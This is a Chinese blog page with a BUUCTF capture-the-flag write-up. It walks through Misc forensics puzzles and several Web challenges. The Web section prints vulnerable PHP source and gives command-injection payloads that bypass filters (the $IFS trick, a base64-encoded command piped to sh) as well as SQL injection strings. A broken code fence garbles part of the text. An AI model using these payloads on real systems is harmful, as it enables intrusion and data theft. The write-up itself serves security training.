

<!DOCTYPE html>
<html lang="zh-CN" data-default-color-scheme=auto>



<head>
  <meta charset="UTF-8">
  <link rel="apple-touch-icon" sizes="76x76" href="https://img.mkerosene.cn/touxiang.jpg">
  <link rel="icon" href="https://img.mkerosene.cn/touxiang.jpg">
  <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=5.0, shrink-to-fit=no">
  <meta http-equiv="x-ua-compatible" content="ie=edge">
  
    <meta http-equiv="Content-Security-Policy" content="upgrade-insecure-requests">
  
  <meta name="theme-color" content="#2f4154">
  <meta name="author" content="Kerosene W">
  <meta name="keywords" content="">
  
    <meta name="description" content="Misc1. 基础破解  题目中给出提示rar密码为四位数字(2563)，故可使用4位数字字典暴力破解，参考^软件链接: https:&#x2F;&#x2F;pan.baidu.com&#x2F;s&#x2F;14JJYOXIUTaZIpfx38KUp9w 提取码: by2s 复制这段内容后打开百度网盘手机App，操作更方便哦  打开后为一个txt文件，包含一个Base64码  解码后得到flag">
<meta property="og:type" content="article">
<meta property="og:title" content="BUUCTF wp(持续更新中)">
<meta property="og:url" content="http://example.com/2020/12/25/BUUCTF-wp/index.html">
<meta property="og:site_name" content="追求源于热爱">
<meta property="og:description" content="Misc1. 基础破解  题目中给出提示rar密码为四位数字(2563)，故可使用4位数字字典暴力破解，参考^软件链接: https:&#x2F;&#x2F;pan.baidu.com&#x2F;s&#x2F;14JJYOXIUTaZIpfx38KUp9w 提取码: by2s 复制这段内容后打开百度网盘手机App，操作更方便哦  打开后为一个txt文件，包含一个Base64码  解码后得到flag">
<meta property="og:locale" content="zh_CN">
<meta property="og:image" content="https://img.mkerosene.cn/buu.png">
<meta property="article:published_time" content="2020-12-25T11:42:37.000Z">
<meta property="article:modified_time" content="2021-11-09T12:02:38.285Z">
<meta property="article:author" content="Kerosene W">
<meta property="article:tag" content="writeup">
<meta name="twitter:card" content="summary_large_image">
<meta name="twitter:image" content="https://img.mkerosene.cn/buu.png">
  
  
  <title>BUUCTF wp(持续更新中) - 追求源于热爱</title>

  <link  rel="stylesheet" href="https://cdn.jsdelivr.net/npm/bootstrap@4/dist/css/bootstrap.min.css" />


  <link  rel="stylesheet" href="https://cdn.jsdelivr.net/npm/github-markdown-css@4/github-markdown.min.css" />
  <link  rel="stylesheet" href="/lib/hint/hint.min.css" />

  
    
    
      
      <link  rel="stylesheet" href="https://cdn.jsdelivr.net/npm/highlight.js@10/styles/github-gist.min.css" />
    
  

  
    <link  rel="stylesheet" href="https://cdn.jsdelivr.net/npm/@fancyapps/fancybox@3/dist/jquery.fancybox.min.css" />
  


<!-- 主题依赖的图标库，不要自行修改 -->

<link rel="stylesheet" href="//at.alicdn.com/t/font_1749284_ba1fz6golrf.css">



<link rel="stylesheet" href="//at.alicdn.com/t/font_1736178_kmeydafke9r.css">


<link  rel="stylesheet" href="/css/main.css" />

<!-- 自定义样式保持在最底部 -->


  <script id="fluid-configs">
    var Fluid = window.Fluid || {};
    var CONFIG = {"hostname":"example.com","root":"/","version":"1.8.13","typing":{"enable":true,"typeSpeed":70,"cursorChar":"_","loop":false},"anchorjs":{"enable":true,"element":"h1,h2,h3,h4,h5,h6","placement":"right","visible":"hover","icon":"❡"},"progressbar":{"enable":true,"height_px":3,"color":"#29d","options":{"showSpinner":false,"trickleSpeed":100}},"copy_btn":true,"image_zoom":{"enable":true,"img_url_replace":["",""]},"toc":{"enable":true,"headingSelector":"h1,h2,h3,h4,h5,h6","collapseDepth":0},"lazyload":{"enable":true,"loading_img":"https://img.mkerosene.cn/loading.gif","onlypost":false,"offset_factor":2},"web_analytics":{"enable":true,"baidu":null,"google":null,"gtag":null,"tencent":{"sid":null,"cid":null},"woyaola":null,"cnzz":null,"leancloud":{"app_id":"FI1uAFAYz0Q3MPDiORqd0JAN-gzGzoHsz","app_key":"EhKAjMe3bmq0WLTSgktGg2OC","server_url":null,"path":"window.location.pathname","ignore_local":false}},"search_path":"/local-search.xml"};
  </script>
  <script  src="/js/utils.js" ></script>
  <script  src="/js/color-schema.js" ></script>
</head>


<body>
  <header style="height: 70vh;">
    <nav id="navbar" class="navbar fixed-top  navbar-expand-lg navbar-dark scrolling-navbar">
  <div class="container">
    <a class="navbar-brand" href="/">
      <strong>mKerosene</strong>
    </a>

    <button id="navbar-toggler-btn" class="navbar-toggler" type="button" data-toggle="collapse"
            data-target="#navbarSupportedContent"
            aria-controls="navbarSupportedContent" aria-expanded="false" aria-label="Toggle navigation">
      <div class="animated-icon"><span></span><span></span><span></span></div>
    </button>

    <!-- Collapsible content -->
    <div class="collapse navbar-collapse" id="navbarSupportedContent">
      <ul class="navbar-nav ml-auto text-center">
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/">
                <i class="iconfont icon-home-fill"></i>
                首页
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/archives/">
                <i class="iconfont icon-archive-fill"></i>
                归档
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/categories/">
                <i class="iconfont icon-category-fill"></i>
                分类
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/tags/">
                <i class="iconfont icon-tags-fill"></i>
                标签
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/links/">
                <i class="iconfont icon-link-fill"></i>
                友链
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/about/">
                <i class="iconfont icon-user-fill"></i>
                关于
              </a>
            </li>
          
        
        
          <li class="nav-item" id="search-btn">
            <a class="nav-link" target="_self" href="javascript:;" data-toggle="modal" data-target="#modalSearch" aria-label="Search">
              &nbsp;<i class="iconfont icon-search"></i>&nbsp;
            </a>
          </li>
        
        
          <li class="nav-item" id="color-toggle-btn">
            <a class="nav-link" target="_self" href="javascript:;" aria-label="Color Toggle">&nbsp;<i
                class="iconfont icon-dark" id="color-toggle-icon"></i>&nbsp;</a>
          </li>
        
      </ul>
    </div>
  </div>
</nav>

    <div class="banner" id="banner" parallax=true
         style="background: url('https://img.mkerosene.cn/default.png') no-repeat center center;
           background-size: cover;">
      <div class="full-bg-img">
        <div class="mask flex-center" style="background-color: rgba(0, 0, 0, 0.3)">
          <div class="page-header text-center fade-in-up">
            <span class="h2" id="subtitle" title="Some writeup about BUUCTF...">
              
            </span>

            
              <div class="mt-3">
  
  
    <span class="post-meta">
      <i class="iconfont icon-date-fill" aria-hidden="true"></i>
      <time datetime="2020-12-25 19:42" pubdate>
        2020年12月25日 晚上
      </time>
    </span>
  
</div>

<div class="mt-1">
  
    <span class="post-meta mr-2">
      <i class="iconfont icon-chart"></i>
      6.3k 字
    </span>
  

  
    <span class="post-meta mr-2">
      <i class="iconfont icon-clock-fill"></i>
      
      
      20 分钟
    </span>
  

  
  
    
      <!-- LeanCloud 统计文章PV -->
      <span id="leancloud-page-views-container" class="post-meta" style="display: none">
        <i class="iconfont icon-eye" aria-hidden="true"></i>
        <span id="leancloud-page-views"></span> 次
      </span>
    
  
</div>

            
          </div>

          
        </div>
      </div>
    </div>
  </header>

  <main>
    
      

<div class="container-fluid nopadding-x">
  <div class="row nomargin-x">
    <div class="d-none d-lg-block col-lg-2"></div>
    <div class="col-lg-8 nopadding-x-md">
      <div class="container nopadding-x-md" id="board-ctn">
        <div class="py-5" id="board">
          <article class="post-content mx-auto">
            <!-- SEO header -->
            <h1 style="display: none">Some writeup about BUUCTF...</h1>
            
              <p class="note note-info">
                
                  本文最后更新于：1 年前
                
              </p>
            
            <div class="markdown-body">
              <h1 id="Misc"><a href="#Misc" class="headerlink" title="Misc"></a>Misc</h1><h2 id="1-基础破解"><a href="#1-基础破解" class="headerlink" title="1. 基础破解"></a>1. 基础破解</h2><p><a target="_blank" rel="noopener" href="https://imgchr.com/i/rhH7tI"><img src="https://s3.ax1x.com/2020/12/26/rhH7tI.md.png" srcset="https://img.mkerosene.cn/loading.gif" lazyload alt="rhH7tI.md.png" style="zoom: 67%;" /></a></p>
<ul>
<li>题目中给出提示rar密码为<strong>四位数字</strong>(2563)，故可使用4位数字字典暴力破解，参考<a href="%E6%9D%A5%E8%87%AA%5B%E5%90%BE%E7%88%B1%E7%A0%B4%E8%A7%A3%5D%5Bhttps://www.52pojie.cn/thread-932984-1-1.html%5D">^软件</a><strong>链接: <a target="_blank" rel="noopener" href="https://pan.baidu.com/s/14JJYOXIUTaZIpfx38KUp9w">https://pan.baidu.com/s/14JJYOXIUTaZIpfx38KUp9w</a> 提取码: by2s 复制这段内容后打开百度网盘手机App，操作更方便哦</strong></li>
</ul>
<p>打开后为一个txt文件，包含一个Base64码</p>
<p><a target="_blank" rel="noopener" href="https://imgchr.com/i/rhHTAA"><img src="https://s3.ax1x.com/2020/12/26/rhHTAA.md.png" srcset="https://img.mkerosene.cn/loading.gif" lazyload alt="rhHTAA.md.png" style="zoom:80%;" /></a></p>
<p>解码后得到flag</p>
<span id="more"></span>

<hr>
<h2 id="2-zip伪加密"><a href="#2-zip伪加密" class="headerlink" title="2. zip伪加密"></a>2. zip伪加密</h2><ul>
<li><p><a target="_blank" rel="noopener" href="https://imgchr.com/i/rhHHht"><img src="https://s3.ax1x.com/2020/12/26/rhHHht.md.png" srcset="https://img.mkerosene.cn/loading.gif" lazyload alt="rhHHht.md.png" style="zoom: 67%;" /></a>首先看提示，zip伪加密，暴力破解是没用的，可以考虑使用winRAR修复人（基本没用😢）</p>
</li>
<li><p>主要用winhex或010 Editor修改文件头的加密标志位</p>
</li>
<li><ul>
<li><blockquote>
<p>一个zip文件有三个部分组成：</p>
<p>压缩源文件数据区+压缩源文件目录区+压缩源文件目录结束标志 （详解链接）</p>
<p>这是三个头标记，主要看第二个</p>
<p>压缩源文件数据区：50 4B 03 04：这是头文件标记</p>
<p>压缩源文件目录区：</p>
<p>50 4B 01 02：目录中文件文件头标记</p>
<p>3F 00：压缩使用的 pkware</p>
<p>版本 </p>
<p>14 00：解压文件所需 pkware 版本 </p>
<p>00 00：全局方式位标记（有无加密，这个更改这里进行伪加密，改为09 00打开就会提示有密码了）</p>
<p>压缩源文件目录结束标志 ：50</p>
<p>4B 05 06：目录结束标记        </p>
</blockquote>
来源[<a target="_blank" rel="noopener" href="https://www.jianshu.com/p/05c81a2b4dd9]">https://www.jianshu.com/p/05c81a2b4dd9]</a></li>
</ul>
</li>
<li><p><code>00 00：全局方式位标记（有无加密，这个更改这里进行伪加密，改为09 00打开就会提示有密码了</code></p>
<p><a target="_blank" rel="noopener" href="https://imgchr.com/i/rhHI7d"><img src="https://s3.ax1x.com/2020/12/26/rhHI7d.md.png" srcset="https://img.mkerosene.cn/loading.gif" lazyload alt="rhHI7d.md.png" style="zoom:80%;" /></a></p>
</li>
<li><p>再次打开9即可得到flag</p>
</li>
</ul>
<hr>
<h2 id="3-九连环"><a href="#3-九连环" class="headerlink" title="3. 九连环"></a>3. 九连环</h2><img src="https://img.mkerosene.cn/123456cry.jpg" srcset="https://img.mkerosene.cn/loading.gif" lazyload alt="123456cry" style="zoom:80%;" />

<ul>
<li>题目给到一个图片，经过binwalk分离出隐藏文件（或win下直接修改扩展名，因为其含有完整的16进制压缩文件结构）</li>
</ul>
<figure class="highlight mipsasm"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs mipsasm"><span class="hljs-keyword">binwalk </span>-e *<span class="hljs-keyword">jpg</span><br></code></pre></td></tr></table></figure>



<p><img src="https://img.mkerosene.cn/20210508085720.png" srcset="https://img.mkerosene.cn/loading.gif" lazyload alt="20210508085720"></p>
<ul>
<li>zip文件为伪加密，做法同2</li>
</ul>
<img src="https://img.mkerosene.cn/20210508153516.png" srcset="https://img.mkerosene.cn/loading.gif" lazyload alt="20210508153516" style="zoom:50%;" />

<ul>
<li>解压后，包含一个含flag.txt的有密码压缩包和一个jpg图片，推测图片必有密码</li>
<li>用binwalk之类工具都没有发现，这时使用steghide提取图片中隐藏信息</li>
</ul>
<figure class="highlight mipsasm"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><code class="hljs mipsasm">steghide info good.<span class="hljs-keyword">jpg	</span><span class="hljs-comment">#查看</span><br>steghide <span class="hljs-keyword">extract </span>-sf good.<span class="hljs-keyword">jpg	</span><span class="hljs-comment">#提取</span><br></code></pre></td></tr></table></figure>

<ul>
<li>提取时有密码提示，好在出题人跳过，直接回车得到ko.txt，内含密码解压getflag。</li>
</ul>
<img src="https://img.mkerosene.cn/20210508085701.png" srcset="https://img.mkerosene.cn/loading.gif" lazyload alt="20210508085701" style="zoom:67%;" />

<hr>
<h2 id="4-另外一个世界"><a href="#4-另外一个世界" class="headerlink" title="4. 另外一个世界"></a>4. 另外一个世界</h2><img src="http://img.mkerosene.cn/monster.jpg" srcset="https://img.mkerosene.cn/loading.gif" lazyload alt="monster" style="zoom: 80%;" />

<ul>
<li>010打开，结尾含01序列，开始以为是摩斯密码，无果…</li>
</ul>
<img src="https://img.mkerosene.cn/20210508160425.png" srcset="https://img.mkerosene.cn/loading.gif" lazyload alt="20210508160425" style="zoom:80%;" />

<ul>
<li>此题为ASCII编码，二进制8个一组，解码得到flag</li>
</ul>
<hr>
<h2 id="5-假如给我三天光明"><a href="#5-假如给我三天光明" class="headerlink" title="5. 假如给我三天光明"></a>5. 假如给我三天光明</h2><img src="http://img.mkerosene.cn/pic.jpg" srcset="https://img.mkerosene.cn/loading.gif" lazyload alt="pic" style="zoom:80%;" />

<ul>
<li>充分发挥想象力，没错，和海伦凯勒有关，图片下部为一串盲文，即另一压缩文件的密码</li>
<li>盲文对照表kmdonowg</li>
</ul>
<img src="https://img.mkerosene.cn/202009091617300.png" srcset="https://img.mkerosene.cn/loading.gif" lazyload alt="202009091617300" style="zoom:80%;" />

<ul>
<li>解压使用Audacity打开.wav，查看波形，听声音为莫斯密码</li>
</ul>
<img src="https://img.mkerosene.cn/20210508162607.png" srcset="https://img.mkerosene.cn/loading.gif" lazyload alt="20210508162607" style="zoom:80%;" />

<ul>
<li>根据波形敲出莫斯串解码得到flag</li>
</ul>
<hr>
<h2 id="6-隐藏的钥匙"><a href="#6-隐藏的钥匙" class="headerlink" title="6. 隐藏的钥匙"></a>6. 隐藏的钥匙</h2><img src="https://img.mkerosene.cn/隐藏的钥匙.jpg" srcset="https://img.mkerosene.cn/loading.gif" lazyload alt="隐藏的钥匙" style="zoom:50%;" />

<ul>
<li>010打开搜索文本flag</li>
</ul>
<p><img src="https://img.mkerosene.cn/20210508163037.png" srcset="https://img.mkerosene.cn/loading.gif" lazyload alt="20210508163037"></p>
<ul>
<li>base64解码得到flag</li>
</ul>
<hr>
<h2 id="7-来首歌吧"><a href="#7-来首歌吧" class="headerlink" title="7. 来首歌吧"></a>7. 来首歌吧</h2><p>….. 0… 0.0. 0000. ..000 ….. 0…. ….0 0000. 0.0. 0… 00000 .0000 000.. 000.. ..0. ….. ..000 . 0…. .0000 00… 0.. 00… 00000 0000. ..000 0000. .0000 0000. .0000 0.0.</p>
<ul>
<li>stego100.wav文件Audacity打开</li>
</ul>
<p><img src="https://img.mkerosene.cn/20210508165440.png" srcset="https://img.mkerosene.cn/loading.gif" lazyload alt="20210508165440"></p>
<ul>
<li>明显的左右声道，一串莫斯密码被隐藏</li>
</ul>
<p><img src="https://img.mkerosene.cn/20210508165501.png" srcset="https://img.mkerosene.cn/loading.gif" lazyload alt="20210508165501"></p>
<ul>
<li>按住Ctrl+鼠标滚轮调整大小，手动解莫斯</li>
</ul>
<p><img src="https://img.mkerosene.cn/20210508165531.png" srcset="https://img.mkerosene.cn/loading.gif" lazyload alt="20210508165531"></p>
<ul>
<li>解码得flag</li>
</ul>
<hr>
<h2 id="8-easycap"><a href="#8-easycap" class="headerlink" title="8.easycap"></a>8.easycap</h2><p><img src="https://img.mkerosene.cn/20210508173405.png" srcset="https://img.mkerosene.cn/loading.gif" lazyload alt="20210508173405"></p>
<ul>
<li>直接追踪TCP流得到flag</li>
</ul>
<img src="https://img.mkerosene.cn/屏幕截图 2021-05-08 173522.png" srcset="https://img.mkerosene.cn/loading.gif" lazyload alt="屏幕截图 2021-05-08 173522" style="zoom: 50%;" />

<hr>
<h2 id="10-后门查杀（Webshell）"><a href="#10-后门查杀（Webshell）" class="headerlink" title="10. 后门查杀（Webshell）"></a>10. 后门查杀（Webshell）</h2><ul>
<li>下载附件，使用D盾查杀</li>
</ul>
<img src="https://img.mkerosene.cn/20210509181334.png" srcset="https://img.mkerosene.cn/loading.gif" lazyload alt="20210509181334" style="zoom:80%;" />

<ul>
<li>密码即为flag</li>
</ul>
<img src="https://img.mkerosene.cn/20210509181344.png" srcset="https://img.mkerosene.cn/loading.gif" lazyload alt="20210509181344" style="zoom:80%;" />

<hr>
<h2 id="11"><a href="#11" class="headerlink" title="11."></a>11.</h2><p>​                                                                            <strong>·</strong></p>
<p>​                                                                            <strong>·</strong></p>
<hr>
<hr>
<h1 id="Web"><a href="#Web" class="headerlink" title="Web."></a>Web.</h1><h2 id="1-HCTF-2018-WarmUp1"><a href="#1-HCTF-2018-WarmUp1" class="headerlink" title="1. [HCTF 2018]WarmUp1"></a>1. [HCTF 2018]WarmUp1</h2><p>查看源码发现source.php被备php源码如下：</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br></pre></td><td class="code"><pre><code class="hljs php"><span class="hljs-meta">&lt;?php</span><br>    highlight_file(<span class="hljs-keyword">__FILE__</span>);<br>    <span class="hljs-class"><span class="hljs-keyword">class</span> <span class="hljs-title">emmm</span></span><br><span class="hljs-class">    </span>&#123;<br>        <span class="hljs-keyword">public</span> <span class="hljs-built_in">static</span> <span class="hljs-function"><span class="hljs-keyword">function</span> <span class="hljs-title">checkFile</span>(<span class="hljs-params">&amp;<span class="hljs-variable">$page</span></span>)</span><br><span class="hljs-function">        </span>&#123;<br>            <span class="hljs-variable">$whitelist</span> = [<span class="hljs-string">&quot;source&quot;</span>=&gt;<span class="hljs-string">&quot;source.php&quot;</span>,<span class="hljs-string">&quot;hint&quot;</span>=&gt;<span class="hljs-string">&quot;hint.php&quot;</span>];<br>            <span class="hljs-keyword">if</span> (! <span class="hljs-keyword">isset</span>(<span class="hljs-variable">$page</span>) || !is_string(<span class="hljs-variable">$page</span>)) &#123;<br>                <span class="hljs-keyword">echo</span> <span class="hljs-string">&quot;you can&#x27;t see it&quot;</span>;<br>                <span class="hljs-keyword">return</span> <span class="hljs-literal">false</span>;<br>            &#125;<br><br>            <span class="hljs-keyword">if</span> (in_array(<span class="hljs-variable">$page</span>, <span class="hljs-variable">$whitelist</span>)) &#123;<br>                <span class="hljs-keyword">return</span> <span class="hljs-literal">true</span>;<br>            &#125;<br><br>            <span class="hljs-variable">$_page</span> = mb_substr(<br>                <span class="hljs-variable">$page</span>,<br>                <span class="hljs-number">0</span>,<br>                mb_strpos(<span class="hljs-variable">$page</span> . <span class="hljs-string">&#x27;?&#x27;</span>, <span class="hljs-string">&#x27;?&#x27;</span>)<br>            );<br>            <span class="hljs-keyword">if</span> (in_array(<span class="hljs-variable">$_page</span>, <span class="hljs-variable">$whitelist</span>)) &#123;<br>                <span class="hljs-keyword">return</span> <span class="hljs-literal">true</span>;<br>            &#125;<br><br>            <span class="hljs-variable">$_page</span> = urldecode(<span class="hljs-variable">$page</span>);<br>            <span class="hljs-variable">$_page</span> = mb_substr(<br>                <span class="hljs-variable">$_page</span>,<br>                <span class="hljs-number">0</span>,<br>                mb_strpos(<span class="hljs-variable">$_page</span> . <span class="hljs-string">&#x27;?&#x27;</span>, <span class="hljs-string">&#x27;?&#x27;</span>)<br>            );<br>            <span class="hljs-keyword">if</span> (in_array(<span class="hljs-variable">$_page</span>, <span class="hljs-variable">$whitelist</span>)) &#123;<br>                <span class="hljs-keyword">return</span> <span class="hljs-literal">true</span>;<br>            &#125;<br>            <span class="hljs-keyword">echo</span> <span class="hljs-string">&quot;you can&#x27;t see it&quot;</span>;<br>            <span class="hljs-keyword">return</span> <span class="hljs-literal">false</span>;<br>        &#125;<br>    &#125;<br><br>    <span class="hljs-keyword">if</span> (! <span class="hljs-keyword">empty</span>(<span class="hljs-variable">$_REQUEST</span>[<span class="hljs-string">&#x27;file&#x27;</span>])<br>        &amp;&amp; is_string(<span class="hljs-variable">$_REQUEST</span>[<span class="hljs-string">&#x27;file&#x27;</span>])<br>        &amp;&amp; emmm::checkFile(<span class="hljs-variable">$_REQUEST</span>[<span class="hljs-string">&#x27;file&#x27;</span>])<br>    ) &#123;<br>        <span class="hljs-keyword">include</span> <span class="hljs-variable">$_REQUEST</span>[<span class="hljs-string">&#x27;file&#x27;</span>];<br>        <span class="hljs-keyword">exit</span>;<br>    &#125; <span class="hljs-keyword">else</span> &#123;<br>        <span class="hljs-keyword">echo</span> <span class="hljs-string">&quot;&lt;br&gt;&lt;img src=\&quot;https://i.loli.net/2018/11/01/5bdb0d93dc794.jpg\&quot; /&gt;&quot;</span>;<br>    &#125;  <br><span class="hljs-meta">?&gt;</span><br></code></pre></td></tr></table></figure>

<hr>
<h2 id="2-GXYCTF2019-Ping-Ping-Ping"><a href="#2-GXYCTF2019-Ping-Ping-Ping" class="headerlink" title="2.[GXYCTF2019]Ping Ping Ping"></a>2.[GXYCTF2019]Ping Ping Ping</h2><ul>
<li>首先根据提示，Ping 127.0.0.1，有回显</li>
<li>加管道符连接命令<code>ls</code>，能够列处当前目录，疑似<code>flag.php</code></li>
</ul>
<img src="C:\Users\23135\Pictures\Saved Pictures\image-20211016152359731.png" srcset="https://img.mkerosene.cn/loading.gif" lazyload style="zoom:67%;" />

<ul>
<li>接下来尝试打开flag.php，发现空格及flag字样均被过滤</li>
</ul>
<img src="C:\Users\23135\Pictures\Saved Pictures\image-20211016161423479.png" srcset="https://img.mkerosene.cn/loading.gif" lazyload alt="image-20211016161423479" style="zoom:67%;" />

<ul>
<li>空格过滤大法，逐一尝试</li>
</ul>
<figure class="highlight awk"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><code class="hljs awk"><span class="hljs-variable">$IFS</span><br><span class="hljs-variable">$&#123;IFS&#125;</span><br><span class="hljs-variable">$IFS</span><span class="hljs-variable">$1</span> <span class="hljs-regexp">//</span>改成其他数字貌似都行<br>&lt;<br>&lt;&gt;<br>&#123;cat,flag.php&#125; <span class="hljs-regexp">//</span>用逗号实现了空格功能<br>%<span class="hljs-number">20</span><br>%<span class="hljs-number">09</span><br></code></pre></td></tr></table></figure>

<figure class="highlight avrasm"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs avrasm"><span class="hljs-symbol">payload:</span>/?ip=<span class="hljs-number">1</span>|cat<span class="hljs-number">$IFS</span><span class="hljs-number">$1flag</span>.php<br></code></pre></td></tr></table></figure>

<ul>
<li>优先查看<code>index.php</code>寻找突破口，回显如下</li>
</ul>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br></pre></td><td class="code"><pre><code class="hljs shell">/?ip=<br>|\&#x27;|\&quot;|\\|\(|\)|\[|\]|\&#123;|\&#125;/&quot;, $ip, $match))&#123;<br>    echo preg_match(&quot;/\&amp;|\/|\?|\*|\&lt;|[\x&#123;00&#125;-\x&#123;20&#125;]|\&gt;|\&#x27;|\&quot;|\\|\(|\)|\[|\]|\&#123;|\&#125;/&quot;, $ip, $match);<br>    die(&quot;fxck your symbol!&quot;);<br>  &#125; else if(preg_match(&quot;/ /&quot;, $ip))&#123;<br>    die(&quot;fxck your space!&quot;);<br>  &#125; else if(preg_match(&quot;/bash/&quot;, $ip))&#123;<br>    die(&quot;fxck your bash!&quot;);<br>  &#125; else if(preg_match(&quot;/.*f.*l.*a.*g.*/&quot;, $ip))&#123;<br>    die(&quot;fxck your flag!&quot;);<br>  &#125;<br><span class="hljs-meta">  $</span><span class="bash">a = shell_exec(<span class="hljs-string">&quot;ping -c 4 &quot;</span>.<span class="hljs-variable">$ip</span>);</span><br>  echo &quot;<br><br>&quot;;<br><span class="hljs-meta">  print_r($</span><span class="bash">a);</span><br>&#125;<br><br>?&gt;<br><br></code></pre></td></tr></table></figure>

<ul>
<li>flag、bash全部被过滤，无法直接打开查看，但$a可以先赋值再利用</li>
</ul>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs shell">payload:?ip=1;a=g;cat$IFS$1fla$a.php<br></code></pre></td></tr></table></figure>

<ul>
<li>内联执行</li>
</ul>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs shell">payload:/?ip=2.2.2.2;cat$IFS$1`ls`<br></code></pre></td></tr></table></figure>

<ul>
<li>先对<code>cat flag.php</code>base64加密，再用sh代替bash(官方payload)</li>
</ul>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs shell">payload:/?ip=2.2.2.2;echo$IFS$1Y2F0IGZsYWcucGhw|base64$IFS$1-d|sh<br></code></pre></td></tr></table></figure>

<ul>
<li>flag不直接显示，需要查看源码</li>
</ul>
<hr>
<h2 id="3-极客大挑战-2019-EasySQL"><a href="#3-极客大挑战-2019-EasySQL" class="headerlink" title="3.[极客大挑战 2019]EasySQL"></a>3.[极客大挑战 2019]EasySQL</h2><ul>
<li>本题存在字符报错，可直接闭合+万能密码绕过验证，登录得到flag</li>
</ul>
<img src="C:\Users\23135\Pictures\Saved Pictures\image-20211016164009690.png" srcset="https://img.mkerosene.cn/loading.gif" lazyload alt="image-20211016164009690" style="zoom: 80%;" />

<ul>
<li><p>按注入顺序来则复杂些</p>
<ul>
<li><p><code>/check.php?username=1&amp;password=1&#39;</code>报错</p>
</li>
<li><p><code>/check.php?username=1&amp;password=1&#39;&#39;</code>正常返回密码错误</p>
</li>
<li><p>使用%23（#）结尾注释进行注入</p>
</li>
<li><p>```shell<br>/check.php?username=1&amp;password=1’ order by 3 %23 //字段为3<br>//开始查看显示位置，flag已爆出<br>/check.php?username=1&amp;password=1’ union select 1,2,3 %23 </p>
<figure class="highlight yaml"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br></pre></td><td class="code"><pre><code class="hljs yaml"><br>  <span class="hljs-type">![image</span><span class="hljs-number">-20211016170011291</span><span class="hljs-string">](C:\Users\23135\Pictures\Saved</span> <span class="hljs-string">Pictures\image-20211016170011291.png)</span><br><br><span class="hljs-meta">---</span><br><span class="hljs-meta"></span><br><span class="hljs-comment">## 4.[极客大挑战 2019]Havefun</span><br><br><span class="hljs-string">+</span> <span class="hljs-string">拿到题目直接查看源码</span><br><br><span class="hljs-string">```html</span><br><span class="hljs-string">&lt;!--</span><br><span class="hljs-string">$cat=$_GET[&#x27;cat&#x27;];</span><br><span class="hljs-string">echo</span> <span class="hljs-string">$cat;</span><br><span class="hljs-string">if($cat==&#x27;dog&#x27;)&#123;</span><br>    <span class="hljs-string">echo</span> <span class="hljs-string">&#x27;Syc&#123;cat_cat_cat_cat&#125;&#x27;</span><span class="hljs-string">;</span><br><span class="hljs-string">&#125;</span><br><span class="hljs-string">--&gt;</span><br></code></pre></td></tr></table></figure></li>
</ul>
</li>
<li><p>Get传参</p>
</li>
</ul>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs shell">payload:/?cat=dog<br></code></pre></td></tr></table></figure>

<img src="C:\Users\23135\Pictures\Saved Pictures\image-20211016170501263.png" srcset="https://img.mkerosene.cn/loading.gif" lazyload style="zoom:67%;" />

<hr>
